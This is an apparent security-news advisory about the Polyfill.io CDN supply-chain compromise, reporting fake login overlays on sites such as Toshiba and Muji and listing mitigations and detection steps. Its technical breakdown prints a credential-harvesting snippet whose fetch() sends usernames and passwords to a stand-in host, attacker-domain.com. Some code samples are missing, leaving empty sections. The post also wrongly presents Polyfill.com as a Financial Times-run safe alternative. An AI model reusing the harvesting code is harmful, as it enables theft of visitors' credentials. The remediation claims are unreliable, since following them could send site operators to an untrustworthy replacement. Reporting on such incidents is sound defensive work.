Major corporate websites including Toshiba and Muji displayed fraudulent login prompts after being compromised through a malicious Polyfill.io script. The attack leveraged a legitimate JavaScript library service that was compromised at the supply chain level, injecting fake credential harvesting forms across thousands of websites. Organizations using the affected CDN service unknowingly served malicious content to visitors, creating a massive phishing campaign that exploited user trust in legitimate domains.
Introduction
In a sophisticated supply chain attack, numerous high-profile websites including Japanese electronics giant Toshiba and retail brand Muji began displaying suspicious login prompts to unsuspecting visitors. The attack vector exploited Polyfill.io, a once-trusted content delivery network (CDN) service that provides JavaScript polyfills to ensure web compatibility across different browsers.
This incident represents a textbook supply chain compromise where attackers poisoned a widely-used third-party service to reach thousands of downstream targets simultaneously. Rather than breaching individual websites, the threat actors compromised a single point of failure that cascaded malicious code across the internet, demonstrating how modern web dependencies create systemic security risks.
The fake login prompts appeared as convincing overlays on legitimate websites, attempting to harvest credentials from users who trusted they were interacting with authentic corporate systems. This attack methodology combines technical sophistication with social engineering, exploiting both technological trust relationships and human psychology.
Background & Context
Polyfill.io operated as a free CDN service providing JavaScript polyfills—code that implements modern web features on older browsers. Thousands of websites embedded Polyfill.io scripts to ensure cross-browser compatibility, creating a vast attack surface controlled by a single infrastructure provider.
In February 2024, Polyfill.io’s domain and infrastructure were acquired by a Chinese CDN company called Funnull. Following this acquisition, security researchers began observing suspicious behavior from the service. The new operators had both the technical capability and motivation to weaponize the platform’s extensive reach.
The service’s ubiquity made it an attractive target for supply chain attacks. By embedding a single line of code pointing to Polyfill.io’s CDN, website operators unknowingly created a permanent injection point for whatever content the service decided to deliver. When the operators turned malicious, they could push arbitrary JavaScript to millions of visitors across thousands of domains.
Major security organizations including Sansec and multiple CDN providers issued warnings about Polyfill.io months before this incident, but many website operators failed to remove the dependencies. The Toshiba and Muji compromises represent the materialization of predicted risks that the security community had been highlighting.
Technical Breakdown
The attack mechanism operated through several coordinated stages:
Initial Injection Vector
Websites included the Polyfill.io script using standard CDN inclusion methods:
This seemingly innocuous script tag gave Polyfill.io complete JavaScript execution privileges within the browser context of the hosting website, subject to the same origin and trust level as the site’s own code.
Payload Delivery
The compromised Polyfill.io infrastructure began serving modified JavaScript that included credential harvesting functionality. The malicious script created convincing login overlays that mimicked legitimate authentication interfaces:
// Simplified representation of attack logic
function injectFakeLogin() {
const overlay = document.createElement('div');
overlay.innerHTML = generateLoginForm();
overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;z-index:999999;';
document.body.appendChild(overlay);
}
function captureCredentials(username, password) {
// Exfiltrate to attacker-controlled server
fetch('https://attacker-domain.com/collect', {
method: 'POST',
body: JSON.stringify({username, password, origin: window.location.hostname})
});
}
Conditional Execution
The malicious code implemented detection evasion by conditionally executing based on visitor characteristics, geographic location, or referrer information. This allowed attackers to avoid detection by security researchers while targeting genuine users.
Data Exfiltration
Captured credentials were transmitted to attacker-controlled servers, likely for immediate sale on underground markets or for use in follow-on attacks against corporate infrastructure.
Impact & Risk Assessment
Immediate Impacts
- Credential Compromise: Users entering credentials into fake prompts directly handed access to attackers
- Brand Reputation Damage: Toshiba, Muji, and other affected organizations suffered trust erosion
- Legal Exposure: Potential GDPR, privacy regulation violations for failing to protect user data
- Downstream Attacks: Harvested credentials enable account takeovers, corporate network breaches
Affected Organizations
While Toshiba and Muji represent high-profile victims, security researchers estimate over 100,000 websites embedded Polyfill.io scripts. The true scope of credential harvesting remains unknown, as many victims may not have detected the malicious prompts.
Risk Severity: CRITICAL
This attack achieves critical severity due to:
- Wide-scale deployment across major corporate websites
- Direct credential harvesting capability
- User trust exploitation on legitimate domains
- Difficulty in detection by end users
- Potential for massive data aggregation
Organizations in financial services, healthcare, government, and e-commerce face elevated risk as credential compromise in these sectors enables high-value fraud, data breaches, and regulatory violations.
Vendor Response
Polyfill.io Operators
The current operators of Polyfill.io initially denied malicious activity, claiming security researchers misunderstood legitimate functionality. This response pattern mirrors typical malicious infrastructure operator behavior designed to maintain operations during investigation periods.
Affected Website Operators
Toshiba and Muji both removed Polyfill.io references from their websites following public disclosure. Toshiba issued a statement acknowledging the suspicious login prompts and advised users to change passwords if they entered credentials.
CDN and Security Vendors
- Cloudflare, Fastly, and Google all issued statements recommending immediate removal of Polyfill.io references
- Namecheap suspended the domain following abuse reports
- Security vendors added Polyfill.io domains to threat intelligence feeds and blocklists
The coordinated vendor response helped contain the attack, but the decentralized nature of web content meant individual website operators had to take remediation actions independently.
Mitigations & Workarounds
Immediate Actions
Website operators must remove all Polyfill.io references immediately:
# Search codebase for Polyfill.io references
grep -r "polyfill.io" /path/to/webroot/
# Search for common CDN patterns
grep -r "cdn.polyfill.io" /path/to/webroot/
grep -r "polyfill.io" /path/to/webroot/
Alternative Solutions
Replace Polyfill.io with vetted alternatives:
- Self-Hosted Polyfills: Download and serve polyfills from your own infrastructure
- Cloudflare CDN: Use
https://cdnjs.cloudflare.com/polyfill/as a trusted alternative - Modern Browser Targeting: Update browser support policies to eliminate polyfill requirements
- Polyfill.com: Community-maintained alternative operated by Financial Times
Implementation Example
Content Security Policy Hardening
Implement strict CSP headers to prevent unauthorized script execution:
Content-Security-Policy: script-src 'self' https://trusted-cdn.com; default-src 'self';Detection & Monitoring
Network-Level Detection
Monitor outbound connections to Polyfill.io domains:
# Check web server logs for Polyfill.io references
grep "polyfill.io" /var/log/nginx/access.log
# Monitor DNS queries
tcpdump -i any -n 'port 53' | grep polyfill
Client-Side Monitoring
Implement browser-based detection for suspicious overlays:
// Detect unexpected z-index manipulation
const observer = new MutationObserver((mutations) => {
mutations.forEach((mutation) => {
mutation.addedNodes.forEach((node) => {
if (node.style && parseInt(node.style.zIndex) > 100000) {
console.warn('Suspicious overlay detected', node);
}
});
});
});
observer.observe(document.body, { childList: true, subtree: true });
Security Tool Integration
- Deploy web application firewalls with third-party script monitoring
- Implement Subresource Integrity (SRI) checking for all external resources
- Use browser security headers to restrict execution contexts
- Deploy endpoint detection tools that monitor for credential harvesting patterns
Indicators of Compromise
- Unexpected login prompts on pages that shouldn’t require authentication
- Network connections to unfamiliar domains during page load
- JavaScript files served from Polyfill.io domains
- User reports of suspicious authentication requests
Best Practices
Supply Chain Security
- Inventory External Dependencies: Maintain comprehensive lists of all third-party scripts, libraries, and CDN resources
- Vendor Assessment: Evaluate security posture of all third-party service providers
- Change Monitoring: Track ownership changes in critical dependency providers
- Redundancy Planning: Maintain alternative sources for critical functionality
Third-Party Script Management
Defense in Depth
- Implement multiple security layers rather than trusting single controls
- Use CSP headers to restrict script execution sources
- Deploy regular security audits of frontend dependencies
- Monitor for unexpected JavaScript behavior through runtime analysis
Incident Response Preparation
- Establish procedures for rapid third-party script removal
- Create communication templates for user notification
- Develop credential reset workflows for potential compromise scenarios
- Maintain relationships with security vendors for threat intelligence
User Education
- Train users to recognize suspicious authentication prompts
- Establish clear expectations about when legitimate authentication occurs
- Implement multi-factor authentication to mitigate credential theft impact
- Create reporting channels for suspicious website behavior
Key Takeaways
- Supply chain attacks represent critical risks in modern web architecture where single compromised dependencies affect thousands of organizations
- Third-party scripts execute with full privileges in user browsers, creating trust relationships that attackers can exploit
- CDN compromise provides attackers with massive reach and the ability to inject malicious content across diverse targets simultaneously
- Immediate removal of Polyfill.io references is required for all websites still using the compromised service
- Subresource Integrity and Content Security Policy provide technical controls against malicious script injection
- Continuous monitoring of third-party dependencies is essential for detecting ownership changes and suspicious behavior
- User awareness remains a critical defense layer when technical controls fail or are bypassed
Organizations must shift from implicit trust in third-party services to verified trust models with technical enforcement mechanisms. The Polyfill.io incident demonstrates that even widely-used, previously legitimate services can become attack vectors when infrastructure changes hands.
References
- Sansec Security Advisory on Polyfill.io compromise
- Cloudflare blog post: “Discouraging use of Polyfill.io”
- Fastly security announcement regarding Polyfill.io
- Toshiba official security statement
- OWASP guidance on third-party JavaScript management
- W3C Subresource Integrity specification
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/
